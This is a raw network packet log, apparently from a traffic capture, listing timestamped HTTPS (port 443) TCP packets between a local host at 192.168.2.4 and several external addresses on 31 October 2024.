                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.447952986 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509314060 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509397984 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509429932 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509471893 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509469032 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509497881 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.509516001 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510737896 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510746956 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510770082 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510797024 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510812998 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510840893 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.510862112 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511588097 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511641979 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511663914 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511672974 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511689901 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511693954 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511710882 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.511744976 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.540067911 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.540096045 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.555341959 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.555433035 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.590754032 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.594054937 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.594099998 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.594218016 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.594263077 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.619437933 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.619477034 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.619488001 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.619544029 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.619569063 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.619618893 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.624345064 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.624414921 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.624474049 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637310028 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637362957 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637406111 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637414932 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637449980 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637593031 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.637638092 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.645828962 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.645879030 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.654588938 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.654647112 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.654680967 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.654748917 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.695496082 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.695534945 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.754786015 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.754857063 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.754910946 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.754961967 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.754978895 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.755027056 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.757071972 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.757126093 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.757157087 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.757210016 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.761540890 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.761594057 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.770153999 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.770205975 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.770231009 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.770283937 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.781408072 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.781631947 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.787657022 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.796428919 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.796468973 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.796499014 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.796504021 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.796516895 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.796555996 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.805066109 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.805149078 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.805162907 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871757984 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871798992 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871809006 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871820927 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871896029 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871928930 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.871939898 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.872142076 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.872185946 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.872195005 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.872236013 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.872446060 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874284029 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874320984 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874362946 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874382973 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874396086 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874418974 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874430895 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874481916 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.874490023 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.878989935 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.879038095 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.879051924 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.880108118 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.880243063 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.880251884 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.886070967 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.886133909 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.886142969 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.895193100 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.895235062 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.895234108 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.895248890 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.895334005 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.896322012 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.901638985 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.901673079 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.901678085 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.901686907 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.901729107 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.906959057 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.912367105 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.912410975 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.912412882 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.912425995 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.912504911 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.917665005 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.923106909 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.923147917 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.923154116 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.923162937 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.923233986 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.928271055 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.933649063 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.933695078 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.933703899 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.939021111 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.939084053 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.939093113 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.975672960 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.975758076 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.975769997 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.988941908 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989008904 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989029884 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989068985 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989176989 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989185095 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989603043 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989643097 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989650965 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989690065 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989720106 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989729881 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989738941 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.989919901 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.990439892 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.990519047 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.990561008 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.990601063 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.990609884 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.990653992 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991163969 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991240978 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991275072 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991281986 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991925001 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991974115 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.991982937 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.995999098 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.996030092 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.996043921 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.996052980 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.996254921 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.000809908 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.003833055 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.003873110 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.003871918 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.003885984 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.003923893 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.007499933 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.009862900 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.009902000 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.009912014 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.013251066 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.013354063 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.013364077 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.015834093 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.015888929 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.015897989 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.018919945 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.018968105 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.018976927 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.021944046 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.021975994 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.021996975 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.022007942 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.022100925 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.024827003 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.027651072 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.027684927 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.027708054 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.027719975 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.027770042 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.030472040 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.033194065 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.033236980 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.033252954 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.036083937 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.036128044 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.036139011 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.039099932 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.039139032 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.039148092 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.039158106 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.039210081 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.039217949 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.041678905 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.041723013 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.041732073 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.044333935 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.044399023 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.044409037 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.046960115 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.047005892 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.047017097 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.049498081 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.049566984 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.049576998 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.052331924 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.052375078 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.052383900 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.054666996 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.054718971 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.054728031 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.057420015 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.057465076 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.057472944 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.150780916 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.493732929 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.493797064 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.493839025 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.493896961 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.493937969 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.493982077 CET49783443192.168.2.4142.250.185.142
